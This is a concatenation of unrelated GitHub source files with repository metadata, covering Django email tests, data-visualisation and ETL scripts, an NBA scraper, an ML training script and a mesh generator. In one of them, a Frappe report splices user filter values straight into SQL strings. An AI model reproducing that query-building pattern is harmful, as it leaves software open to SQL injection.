@patch(\"emails.actions.base_action.messages_missing_recipients\")\n def test_missing_recipients(\n self, mock_messages_missing_recipients: MagicMock\n ) -> None:\n # Arrange\n self.instructor1.email = None\n self.instructor1.save()\n self.instructor2.email = None\n self.instructor2.save()\n request = RequestFactory().get(\"/\")\n signal = INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME\n\n # Act\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n mock_messages_missing_recipients.assert_called_once_with(request, signal)\n\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n @patch(\"emails.actions.base_action.messages_missing_template\")\n def test_missing_template(self, mock_messages_missing_template: MagicMock) -> None:\n # Arrange\n request = RequestFactory().get(\"/\")\n self.template.delete()\n signal = INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME\n\n # Act\n instructor_training_approaching_signal.send(\n sender=self.event,\n request=request,\n event=self.event,\n event_start_date=self.event.start,\n )\n\n # Assert\n mock_messages_missing_template.assert_called_once_with(request, signal)\n\n\nclass TestInstructorTrainingApproachingReceiverIntegration(TestBase):\n @override_settings(FLAGS={\"EMAIL_MODULE\": [(\"boolean\", True)]})\n def test_integration(self) -> None:\n # Arrange\n self._setUpRoles()\n self._setUpTags()\n self._setUpUsersAndLogin()\n\n template = EmailTemplate.objects.create(\n name=\"Test Email Template\",\n signal=INSTRUCTOR_TRAINING_APPROACHING_SIGNAL_NAME,\n from_header=\"workshops@carpentries.org\",\n cc_header=[\"team@carpentries.org\"],\n bcc_header=[],\n subject=\"Greetings\",\n body=\"Hello! 
Nice to meet **you**.\",\n )\n\n ttt_organization = Organization.objects.create(\n domain=\"carpentries.org\", fullname=\"Instructor Training\"\n )\n event = Event.objects.create(\n slug=\"test-event\",\n host=Organization.objects.create(domain=\"example.com\", fullname=\"Example\"),\n administrator=ttt_organization,\n start=date.today() + timedelta(days=30),\n )\n ttt_tag = Tag.objects.get(name=\"TTT\")\n event.tags.add(ttt_tag)\n\n instructor1 = Person.objects.create(\n personal=\"Kelsi\",\n middle=\"\",\n family=\"Purdy\",\n username=\"purdy_kelsi\",\n email=\"purdy.kelsi@example.com\",\n secondary_email=\"notused@amy.org\",\n gender=\"F\",\n airport=self.airport_0_0,\n github=\"purdy_kelsi\",\n twitter=\"purdy_kelsi\",\n url=\"http://kelsipurdy.com/\",\n affiliation=\"University of Arizona\",\n occupation=\"TA at Biology Department\",\n orcid=\"0000-0000-0000\",\n is_active=True,\n )\n instructor2 = Person.objects.create(\n personal=\"Jayden\",\n middle=\"\",\n family=\"Deckow\",\n username=\"deckow_jayden\",\n email=\"deckow.jayden@example.com\",\n secondary_email=\"notused@example.org\",\n gender=\"M\",\n airport=self.airport_0_50,\n github=\"deckow_jayden\",\n twitter=\"deckow_jayden\",\n url=\"http://jaydendeckow.com/\",\n affiliation=\"UFlo\",\n occupation=\"Staff\",\n orcid=\"0000-0000-0001\",\n is_active=True,\n )\n instructor_role = Role.objects.get(name=\"instructor\")\n Task.objects.create(event=event, person=instructor1, role=instructor_role)\n\n url = reverse(\"task_add\")\n payload = {\n \"task-event\": event.pk,\n \"task-person\": instructor2.pk,\n \"task-role\": instructor_role.pk,\n }\n\n # Act\n rv = self.client.post(url, data=payload)\n\n # Arrange\n self.assertEqual(rv.status_code, 302)\n ScheduledEmail.objects.get(template=template)\n","repo_name":"carpentries/amy","sub_path":"amy/emails/tests/actions/test_instructor_training_approaching_receiver.py","file_name":"test_instructor_training_approaching_receiver.py","file_ext":"py","file_size_in_byte":9826,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"29"} +{"seq_id":"12722847830","text":"import glob\nimport os\n\nimport pandas\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import row, column\nfrom bokeh.models import Band\nfrom bokeh.models import ColumnDataSource, Select\nfrom bokeh.models import TableColumn, DataTable\nfrom bokeh.plotting import figure\n\ngrid_search_path = 'results/grid_search_1122_1128'\n\n# output_file(\"test.html\", title=\"Test\")\n\n\n# In[13]:\n\n\ncsv_files = sorted(glob.glob(os.path.join(grid_search_path, 'experiment*.csv')))\n# Replace Nan values with '' to avoid JSON serialization error\ncsvs = [pandas.read_csv(c).fillna('None') for c in csv_files]\n\n# Get csv file names in a dict\ncsv_names = {}\nfor i, f in enumerate(csv_files):\n csv_names[f[-10:-4]] = {\n 'file_name': f,\n 'id': i\n }\n\n\n# In[14]:\n\n\ndef get_dataset(exp_id):\n df = csvs[exp_id]\n\n df['lower'] = df['valid_acc_mean'] - 2 * df['valid_acc_std']\n df['upper'] = df['valid_acc_mean'] + 2 * df['valid_acc_std']\n\n return ColumnDataSource(df.reset_index())\n\n\n# In[15]:\n\n\ndef update_plot(attrname, old, new):\n exp = experiment_select.value\n\n exp_id = csv_names[exp]['id']\n src = get_dataset(exp_id)\n\n experiment_source.data.update(src.data)\n\n\n# In[21]:\n\n\ndef make_plot(source):\n TOOLS = \"pan,wheel_zoom,box_zoom,reset,save\"\n\n p = figure(plot_width=1000, plot_height=600, tools=TOOLS)\n p.scatter(x='0', y='valid_acc_mean', fill_alpha=0.3, size=5, 
source=source)\n\n band = Band(base='0', lower='lower', upper='upper', source=source, level='underlay',\n fill_alpha=1.0, line_width=1, line_color='black')\n p.add_layout(band)\n\n p.title.text = 'Grid Search {}'.format(grid_search_path)\n p.xgrid[0].grid_line_color = None\n p.ygrid[0].grid_line_alpha = 0.5\n p.xaxis.axis_label = 'epoch'\n p.yaxis.axis_label = 'valid_acc'\n\n return p\n\n\ndef get_summary_table():\n summary = pandas.DataFrame(columns=['exp_name', 'final_acc', 'final_std'])\n\n for i, c in enumerate(csvs):\n exp_name = [list(csv_names.keys())[i]]\n\n # with patience set to 100 in EarlyStopper callback, valid_acc is spposed not to move in the last 100 epochs\n c_final = c.iloc[-100:, :].mean()\n\n final_acc = [c_final['valid_acc_mean']]\n final_std = [c_final['valid_acc_std']]\n\n summary = pandas.concat([summary, pandas.DataFrame({\n 'exp_name': exp_name,\n 'final_acc': final_acc,\n 'final_std': final_std,\n })])\n\n return ColumnDataSource(summary.reset_index())\n\n\n# In[22]:\n\n\n# Summary table\ntable_source = get_summary_table()\ncolumns = [\n TableColumn(field=\"exp_name\", title=\"Experiment\"),\n TableColumn(field=\"final_acc\", title=\"Accuracy\"),\n TableColumn(field=\"final_std\", title=\"Std\"),\n]\ndata_table = DataTable(source=table_source, columns=columns, width=600, height=600)\n\n# Selected experiment graph\nexperiment_select = Select(value='0', title='Experiment', options=sorted(csv_names.keys()))\n\nexperiment_source = get_dataset(exp_id=0)\nplot = make_plot(experiment_source)\n\nexperiment_select.on_change('value', update_plot)\ncontrols = column(experiment_select)\n\n# HTML layout\ncurdoc().add_root(row(column(plot, controls), data_table))\ncurdoc().title = \"Grid Search Results\"\n","repo_name":"alxthm/S3R","sub_path":"scripts/plot_acc_graphs.py","file_name":"plot_acc_graphs.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7441347633","text":"'''\n프로그래머스 Level 1. 핸드폰 번호 가리기\n'''\n\ndef solution(phone_number):\n answer = ''\n count = 0\n n = len(phone_number)\n for num in range(n-1,-1,-1):\n if count < 4:\n char = phone_number[num]\n else:\n char = '*'\n count += 1\n answer = char + answer\n return answer\n\nprint(solution(\"027778888\"))","repo_name":"hj-k66/CodingTest","sub_path":"Programmers/LV1/핸드폰번호가리기.py","file_name":"핸드폰번호가리기.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24405485621","text":"# -*- coding: utf-8 -*-\n\"\"\"\n _ _ ____ _____ _ _____ \n | \\ | | _ \\ /\\ / ____| | | / ____| \n | \\| | |_) | / \\ | | __ __ _ _ __ ___ ___| | ___ __ _ | (___ ___ _ __ __ _ _ __ ___ _ __ \n | . 
` | _ < / /\\ \\ | | |_ |/ _` | '_ ` _ \\ / _ \\ |/ _ \\ / _` | \\___ \\ / __| '__/ _` | '_ \\ / _ \\ '__|\n | |\\ | |_) / ____ \\ | |__| | (_| | | | | | | __/ | (_) | (_| | ____) | (__| | | (_| | |_) | __/ | \n |_| \\_|____/_/ \\_\\ \\_____|\\__,_|_| |_| |_|\\___|_|\\___/ \\__, | |_____/ \\___|_| \\__,_| .__/ \\___|_| \n __/ | | | \n |___/ |_| \n\"\"\"\n\nimport pandas as pd\nfrom sqlalchemy import types\nimport datetime\nfrom secure_scraper_setup import oracleCreator, alchemyCreator, isNumber, table_scrape, dateDiff\n\n#load database connections from secure file\nengine = alchemyCreator()\noracle_con = oracleCreator()\noracle_cur = oracle_con.cursor()\n\n#get max date from gamelog dataset\noracle_query = \"\"\"select EXTRACT(YEAR from MAX(GAME_DATE)+1) as YEARID,\nEXTRACT(MONTH from MAX(GAME_DATE)+1) as MONTHID ,\nEXTRACT(DAY from MAX(GAME_DATE)+1) as DAYID \nfrom NBA_GAMELOG\"\"\" #only select 2010 or later\ndf_date = pd.read_sql_query(oracle_query,oracle_con) #build dataframe from query;\n\n#close cursor and connection\noracle_cur.close()\noracle_con.close()\n\n#define HTML attributes for scraping\ntableHead = 'thead'\ntableHeadRow = 'tr'\ntableHeadCell = 'th'\ntableBody = 'tbody'\ntableBodyRow = 'tr'\ntableBodyCell = 'td'\n\n#loop through URL's generated by dateDiff using max date query results as inputs\nfor url in dateDiff(df_date.iloc[0]['MONTHID'],df_date.iloc[0]['DAYID'],df_date.iloc[0]['YEARID']):\n #open a new oracle connection/cursor each loop to avoid timeouts\n oracle_con = oracleCreator()\n oracle_cur = oracle_con.cursor()\n #scrape the page\n try:\n header = table_scrape('header',url,tableHead,tableHeadRow,tableHeadCell,tableBody,tableBodyRow,tableBodyCell)\n body = table_scrape('body',url,tableHead,tableHeadRow,tableHeadCell,tableBody,tableBodyRow,tableBodyCell)\n \n for i,iBody in enumerate(body):\n if isNumber(iBody[0]):\n for x, iCell in enumerate(iBody):\n if iCell is None:\n body[i][x] = float(0)\n else:\n if isNumber(iCell):\n body[i][x] = float(iCell)\n else:\n body.remove(iBody)\n df = pd.DataFrame(data = body, columns = header)\n df = df.rename(columns={\"Date\": \"GAME_DATE\", \"FG%\": \"FGP\", \"3P\": \"TP\", \"3PA\": \"TPA\", \"3P%\": \"TPP\", \"+/-\": \"PM\", \"FT%\": \"FTP\"}) #get rid of weird characters in column names \n df = df.fillna(0.0) #fill any blank stats with 0 \n df['MP'] = df['MP'].apply(lambda x: round((float((str(x)+\":0\").split(\":\")[0]) + float((str(x)+\":0\").split(\":\")[1])/100*1.667),2)) #convert minutes played to number\n df = df.apply(lambda x: x.replace(u'\\xa0', u' ')) #replace odd ascii characters to prevent Oracle errors\n #convert number fields to floats (from string objects)\n for col in ['FG','FGA','FGP','TP','TPA','TPP','FT','FTA','FTP','ORB','DRB','TRB','AST','STL','BLK','TOV','PF','PTS','GmSc','MP']:\n df[col] = df[col].apply(lambda x: float(x))\n\n #extract date from URL\n df['GAME_DATE'] = url.replace('https://www.basketball-reference.com/friv/dailyleaders.fcgi?month=','').replace('&day=','/').replace('&year=','/') \n\n #remove unneeded columns \n df = df[['Rk','Player','Tm','Opp','FG','FGA','FGP','TP','TPA','TPP','FT','FTA','FTP','ORB','DRB','TRB','AST','STL','BLK','TOV','PF','PTS','GmSc','MP','GAME_DATE']]\n df = df.applymap(str) #change everything to a string to load into buffer tables smoothly\n \n #prepare datatype for SQL insertion \n dtyp = {c:types.VARCHAR(df[c].str.len().max())\n for c in df.columns[df.dtypes == 'object'].tolist()}\n \n #perform SQL insertion\n try: \n date = 
url.replace('https://www.basketball-reference.com/friv/dailyleaders.fcgi?month=','').replace('&day=','/').replace('&year=','/')\n df.to_sql('nba_buffer_gamelog', engine, index=False, if_exists='append',dtype = dtyp, chunksize = 100)\n print('-Imported date: ' + date)\n except BaseException as e:\n print('-Failed to write to Oracle: '+ str(e))\n oracle_cur.close()\n oracle_con.close()\n except BaseException as e:\n fail_date = url.replace('https://www.basketball-reference.com/friv/dailyleaders.fcgi?month=','').replace('&day=','/').replace('&year=','/')\n print('-Fail on date ' + fail_date + ': '+ str(e))\n \n#open final Oracle connection to perform buffer procedure \noracle_con = oracleCreator()\noracle_cur = oracle_con.cursor()\ntry:\n oracle_cur.execute('BEGIN NBA_PARSE_BUFFER_GAMELOG(); END;')\n print('-NBA_PARSE_BUFFER_GAMELOG complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_GAMELOG_SEASON(); END;')\n print('-NBA_UPDATE_GAMELOG_SEASON complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_GAMELOG_G_COUNT(); END;')\n print('-NBA_UPDATE_GAMELOG_G_COUNT complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_PREV_GAMES(); END;')\n print('-NBA_UPDATE_PREV_GAMES complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\ntry:\n oracle_cur.execute('BEGIN NBA_UPDATE_STAT_BASE(); END;')\n print('-NBA_UPDATE_STAT_BASE complete'+\" : \"+str(datetime.datetime.now()))\nexcept BaseException as e:\n print('Buffer procedures failed')\n print(str(e))\n \noracle_cur.close()\noracle_con.close()\nprint('-Finished'+\" : \"+str(datetime.datetime.now()))\n \n\n \n \n","repo_name":"talktotfp/dfs_nba","sub_path":"basic_beautiful_soup/bball_ref_scraper_complete.py","file_name":"bball_ref_scraper_complete.py","file_ext":"py","file_size_in_byte":6450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7140177854","text":"# import required libraries\nimport pandas as pd\nimport json\n\n\n# Read the dataset\ndf= pd.read_csv(\"data/BERT_QA_corrected.csv\")\n\n\n# Data Transformation (Convert data into required json format for processing)\n# create input 'intents.json' file\nintent_json={}\nlist_of_tags=[]\n# loop through the dataframe to fetch the patterns and responses for each tag\nfor i in range(0, len(df['tag'].unique())):\n d={}\n d['tag']=df['tag'].unique()[i]\n d['patterns']=df.loc[df['tag']==df['tag'].unique()[i], 'question'].tolist()\n d['responses']=df.loc[df['tag']==df['tag'].unique()[i], 'context'].tolist()\n d['context']=[\"\"]\n list_of_tags.append(d) \nintent_json['intents']=list_of_tags\nprint(intent_json)\n\n\n# Save json file\nwith open(\"data/intents.json\", \"w\") as fp:\n json.dump(intent_json,fp)","repo_name":"Nikita-Pardeshi/dsan_chatbot","sub_path":"chatbot_data_formatting.py","file_name":"chatbot_data_formatting.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37371479229","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport sqlalchemy as sql\n\ndef load_data(messages_filepath, 
categories_filepath):\n \"\"\"\n Load the files containing the messages and the categories and combine them in one dataframe using the \"id\" column as key\n \n Args:\n messages_filepath: The messages file\n categories_filepath: The categories file\n \n Returns:\n df: The combined dataframe\n \"\"\"\n messages = pd.read_csv(messages_filepath)\n categories = pd.read_csv(categories_filepath)\n df = messages.set_index(\"id\").join(categories.set_index(\"id\"))\n return df\n \ndef clean_data(df):\n \"\"\"\n Cleans the dataframe:\n -Splits each category into its own column and naming it accordingly. \n -converts values to binary (and corrects the values >1 to 1). \n -Drops duplicates.\n \n Args:\n df: Merged messages and categories dataframe\n \n Returns:\n df: Clean dataframe\n \"\"\"\n categories = df.categories.str.split(pat=\";\",expand=True)\n row = categories.iloc[0,:]\n category_colnames = [names[:-2] for names in row]\n categories.columns = category_colnames\n for column in categories.columns:\n # set each value to be the last character of the string\n categories[column] = categories[column].str[-1]\n # convert column from string to numeric\n categories[column] = categories[column].astype(\"int\")\n df.drop([\"categories\"], axis=1, inplace = True) #delete the initial catagory column\n df = df.join(categories) #add the cleaned catagory columns to the dataframe\n improper_values = df.loc[df.related==2].related.index # filter the cells with a value of 2 instead of 1\n df.loc[improper_values,\"related\"]=1 # convert these values to 1\n df = df.drop_duplicates()\n return df\n\ndef save_data(df, database_filename):\n \"\"\" \n Stores the dataframe into a SQLite database,\n \n Args:\n df: the cleaned dataframe\n database_filename : destination path of SQLite database file.\n \"\"\"\n engine = sql.create_engine(f\"sqlite:///{database_filename}\")\n df.to_sql('NLP_Table', engine, index=False) \n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. 
\\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Imad-Cherigui/Disaster-response-pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41196452174","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import render_template\n\nfrom trello import Trello\n\n\napp = Flask(__name__)\n\n\nstats = {}\n\n@app.route(\"/\")\ndef root():\n return render_template('index.html')\n\n@app.route(\"/year/<year>\")\ndef year(year):\n year = int(year)\n if year not in stats:\n print(f\"Stats for {year} not found, hitting API\")\n stats[year] = Trello.get_yearly_stats(year)\n return jsonify(stats[year])\n\n@app.route(\"/years\")\ndef available_years():\n return jsonify(Trello.get_available_years())\n\nif __name__ == '__main__':\n app.run()\n\n\n","repo_name":"theletterd/yearly_goals","sub_path":"yearly_goals.py","file_name":"yearly_goals.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19790346704","text":"import pandas as pd\r\nimport csv\r\n\r\nfile1='C:/Users/a2z/Downloads/c-127-hw--main/c-127-hw--main/bright_stars.csv'\r\nfile2='C:/Users/a2z/Downloads/c-127-hw--main/c-127-hw--main/dwarf_stars .csv'\r\nd1=[]\r\nd2=[]\r\nwith open(file1,'r' ,encoding='utf-8')as f:\r\n reader=csv.reader(f)\r\n for i in reader:\r\n d1.append(i)\r\n\r\nwith open(file2,'r' ,encoding='utf-8')as g:\r\n reader=csv.reader(g)\r\n for i in reader:\r\n d2.append(i)\r\n\r\nh1=d1[0]\r\n#print(h1)\r\nh2=d2[0]\r\nh=h1+h2\r\np_d1=d1[1:]\r\np_d2=d2[1:]\r\np_d=[]\r\nfor i in p_d1:\r\n p_d.append(i)\r\nfor i in p_d2:\r\n p_d.append(i)\r\nwith open('total_stars.csv','w',encoding='utf-8')as f:\r\n csv_writer=csv.writer(f)\r\n csv_writer.writerow(h)\r\n csv_writer.writerows(p_d)\r\ndf=pd.read_csv('total_stars.csv')\r\n\r\n","repo_name":"Aditi-the-best/C-129","sub_path":"C-129.py","file_name":"C-129.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27446369152","text":"\nimport frappe\n#from frappe import __\n\ndef execute(filters=None):\n columns = get_columns()\n conditions=get_conditions(filters)\n data=get_data(filters,conditions)\n return columns, data\n\ndef get_columns():\n columns = [\n {\n 'fieldname': 'company',\n 'label': 'Company',\n 'fieldtype': \"Data\",\n },\n { \n 'fieldname': 'supplier_group',\n 'label': 'Supplier Group',\n 'fieldtype': \"Link\",\n 'options': 'Supplier Group'\n },\n {\n 'fieldname': 'name',\n 'label': 'Name',\n 'fieldtype': \"Data\",\n },\n {\n 'fieldname': 'supplier_name',\n 'label': 'Supplier',\n 'fieldtype': \"Link\",\n 'options': 'Supplier'\n },\n {\n 'fieldname': 'rate',\n 'label': 'Rate',\n 'fieldtype': \"Float\",\n },\n {\n 'fieldname': 'amount',\n 'label': 'Amount',\n 'fieldtype': \"Float\",\n },\n {\n 'fieldname': 'item_code',\n 'label': 'Item Code',\n 'fieldtype': \"Link\",\n 'options': 'Item' \n }\n \n ]\n return columns\ndef get_conditions(filters):\n conditions=\"\"\n if filters.get(\"company\"):\n conditions+= \" and p.company='{}'\".format(filters.get('company'))\n\n if filters.get(\"supplier_group\"):\n conditions+=\" and 
`tabSupplier`.supplier_group='{}'\".format(filters.get('supplier_group'))\n if filters.get(\"name\"):\n conditions+=\" and p.name='{}'\".format(filters.get('name'))\n return conditions\n\ndef get_data(filters,conditions):\n query=frappe.db.sql(\"\"\" select p.company,tabSupplier.supplier_group,\n p.name,`tabSupplier`.supplier_name,\n `tabPurchase Order Item`.rate,`tabPurchase Order Item`.amount,\n `tabPurchase Order Item`.item_code from `tabPurchase Order`p\n left join `tabPurchase Order Item` on p.name=`tabPurchase Order Item`.parent \n left join `tabSupplier` on `tabSupplier`.supplier_name=p.supplier where \n `tabSupplier`.supplier_name!= '' %s\"\"\" %(conditions),as_dict=1) \n return query\n\n\n","repo_name":"prachibobade/testrepo","sub_path":"library_management/library_management/report/test4/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35302761701","text":"#!/usr/bin/env python3\n\"\"\"Trains a machine learning model suitable for mutant selection.\n\nRun `train_model.py --help` for more information.\n\"\"\"\n\nimport argparse\nimport glob\nimport os\nimport os.path\n\nimport joblib\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport sklearn_pandas\nfrom scipy import sparse\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import Ridge\nfrom sklearn.preprocessing import OneHotEncoder, StandardScaler\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument(\"--model\", required=True, choices=[\"linear\", \"randomforest\"])\narg_parser.add_argument(\"--data\", required=True, choices=[\"all\", \"small\"])\narg_parser.add_argument(\"--out\", required=True, type=str)\narg_parser.add_argument(\n \"--project_only\",\n action=\"store_true\",\n help=\"If set, training data will only be drawn from the same project.\",\n)\narg_parser.add_argument(\n \"--between_projects\",\n action=\"store_true\",\n help=\"If set, training data will only be drawn from other projects.\",\n)\narg_parser.add_argument(\n \"results_dir\",\n type=str,\n help=\"The directory to search for customized_mutants.csv files.\",\n)\nargs = arg_parser.parse_args()\n\nassert not (args.project_only and args.between_projects), \"Args cannot be combined\"\n\n# Validate the results_dir is a directory.\nassert os.path.isdir(args.results_dir)\n\n# Find the customized_mutants.csv files for each individual project.\n# (e.g., '{results_dir}/Codec/18f/customized-mutants.csv')\npaths = glob.glob(os.path.join(args.results_dir, \"**/**/*customized-mutants.csv\"))\nif not paths:\n raise Exception(f\"No customized-mutants.csv files found in {args.results_dir}\")\n\n# Read all results and concatenate into a single DataFrame: cm_df\ncm_dfs = []\nfor path in paths:\n print(f\"Reading: {path}\")\n cm_dfs.append(pd.read_csv(path))\ncm_df = pd.concat(cm_dfs)\n\n# We're only interested in covered mutants, so immediately discard uncovered.\ncm_df.isCovered = cm_df.isCovered.astype(\"bool\")\ncm_df = cm_df[cm_df.isCovered]\n\n# Assert that we only have one bug ID per project\nassert (cm_df.groupby(\"projectId\").bugId.nunique() == 1).all()\n\nif args.data == \"small\":\n mapper = sklearn_pandas.DataFrameMapper(\n [\n (\n [\"mutationOperator\", \"parentStmtContextDetailed\"],\n OneHotEncoder(handle_unknown=\"ignore\"),\n )\n ]\n )\nelif args.data == \"all\":\n mapper = sklearn_pandas.DataFrameMapper(\n [\n 
([\"lineRatio\"], [SimpleImputer(strategy=\"mean\"), StandardScaler()]),\n (\n [\"nestingIf\", \"nestingLoop\", \"nestingTotal\", \"maxNestingInSameMethod\"],\n StandardScaler(),\n ),\n (\n [\n \"nestingRatioLoop\",\n \"nestingRatioIf\",\n \"nestingRatioTotal\",\n \"hasOperatorChild\",\n \"hasVariableChild\",\n \"hasLiteralChild\",\n ],\n None,\n ),\n (\n [\"nodeTypeBasic\", \"nodeTypeDetailed\"],\n [\n SimpleImputer(strategy=\"constant\", fill_value=\"Unknown\"),\n OneHotEncoder(handle_unknown=\"ignore\"),\n ],\n ),\n (\n [\n \"mutationOperator\",\n \"mutationOperatorGroup\",\n \"nodeContextBasic\",\n \"astContextBasic\",\n \"astContextDetailed\",\n \"astStmtContextBasic\",\n \"astStmtContextDetailed\",\n \"parentContextBasic\",\n \"parentContextDetailed\",\n \"parentStmtContextBasic\",\n \"parentStmtContextDetailed\",\n ],\n OneHotEncoder(handle_unknown=\"ignore\"),\n ),\n ]\n )\nelse:\n raise Exception(f\"Unexpected --data arg: \" + str(args.data))\n\nX_all = mapper.fit_transform(cm_df.copy()).astype(np.float32)\ny_all = cm_df.pKillsDom.values.copy()\n\nif args.model == \"linear\":\n X_all = sparse.csc_matrix(X_all)\nelif args.model == \"randomforest\":\n X_all = sparse.csc_matrix(X_all)\n\n\ndef _fit_model(project_id, train_set_selection, selection_key):\n assert (cm_df.projectId == project_id).any()\n bug_id = cm_df[cm_df.projectId == project_id].bugId.drop_duplicates()\n assert len(bug_id) == 1\n bug_id = bug_id.iloc[0]\n\n X = X_all[train_set_selection]\n assert not np.shares_memory(X, X_all)\n y = y_all[train_set_selection]\n\n assert X.shape[0] < len(cm_df)\n assert y.shape[0] < len(cm_df)\n\n if args.model == \"linear\":\n model = Ridge(solver=\"sparse_cg\", copy_X=False)\n elif args.model == \"randomforest\":\n model = RandomForestRegressor(\n max_depth=3,\n n_estimators=10,\n n_jobs=1,\n # n_jobs=max(1, os.cpu_count() // 8),\n )\n else:\n raise Exception(f\"Unexpected model arg: \" + str(args.model))\n model.fit(X, y)\n return (project_id, bug_id, selection_key), model\n\n\ndef fit_model(project_id, held_out_class_name):\n assert (cm_df.className == held_out_class_name).any()\n train_set_selection = cm_df.className != held_out_class_name\n if args.project_only:\n train_set_selection = train_set_selection & (cm_df.projectId == project_id)\n return _fit_model(project_id, train_set_selection, {\"class\": held_out_class_name})\n\n\ndef fit_model_from_other_projects(project_id):\n assert isinstance(project_id, str)\n train_set_selection = cm_df.projectId != project_id\n return _fit_model(project_id, train_set_selection, {\"project\": project_id})\n\n\nproject_names = [\n tuple(row)\n for _, row in cm_df[[\"projectId\", \"className\"]].drop_duplicates().iterrows()\n]\nproject_classes = [\n tuple(row)\n for _, row in cm_df[[\"projectId\", \"className\"]].drop_duplicates().iterrows()\n]\n\nif args.data == \"small\":\n n_jobs = int(os.getenv(\"TRAIN_MODEL_CPUS\", \"-1\"))\nelif args.data == \"all\":\n n_jobs = int(os.getenv(\"TRAIN_MODEL_CPUS\", \"8\"))\n\nelse:\n raise Exception(f\"Unexpected model arg: \" + str(args.model))\n\nif args.between_projects:\n fit_model_delayed = joblib.delayed(fit_model_from_other_projects)\n parallel_jobs = [fit_model_delayed(n) for n in cm_df.projectId.drop_duplicates()]\nelse:\n fit_model_delayed = joblib.delayed(fit_model)\n parallel_jobs = [fit_model_delayed(*t) for t in project_classes]\nprint(f\"Training {len(parallel_jobs)} models\")\nresults = joblib.Parallel(n_jobs=n_jobs, verbose=61)(parallel_jobs)\n\n# Save all results, including models, to 
disk\nprint(f\"Writing to: {args.out}\")\njoblib.dump((mapper, results), args.out)\n","repo_name":"ryuparish/mutant_prioritization","sub_path":"artifact/code/data_analysis/ml/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13506678857","text":"from math import pi\nfrom argparse import ArgumentParser\nimport gmsh\n\nSIZE_DOMAIN_Y = 5000.0\n\ndef z_offset_at(y: float) -> float:\n \"\"\"\n Compute the difference in z-coordinate between reference and physical space\n according to eq. (4.1) of the description for SPE11 Version C, given a\n y-coordinate in the reference space.\n \"\"\"\n f = (y - 2500.0)/2500.0\n return 150.0*(1.0 - f*f) + 10.0*y/SIZE_DOMAIN_Y\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Create the geometry for SPE11 version C\")\n parser.add_argument(\n \"-s\",\n \"--mesh-size\",\n required=True,\n help=\"Set the characteristic mesh size in the domain. This will be defined in the\"\n \"last line of the created .geo file, where you can edit it manually afterwards\"\n )\n args = vars(parser.parse_args())\n\n gmsh.initialize()\n gmsh.open(\"spe11b.geo\")\n\n print(\"Reading entities & physical groups from the model\")\n entities = {\n \"points\": [(tag, gmsh.model.getValue(0, tag, [])) for _, tag in gmsh.model.getEntities(0)],\n \"curves\": [(tag, gmsh.model.getAdjacencies(1, tag)[1]) for _, tag in gmsh.model.getEntities(1)],\n \"surfaces\": [(tag, gmsh.model.getAdjacencies(2, tag)[1]) for _, tag in gmsh.model.getEntities(2)]\n }\n surface_to_physical_properties = {}\n for dim, index in gmsh.model.getPhysicalGroups(dim=2):\n name = gmsh.model.getPhysicalName(dim, index)\n for tag in gmsh.model.getEntitiesForPhysicalGroup(dim, index):\n assert tag not in 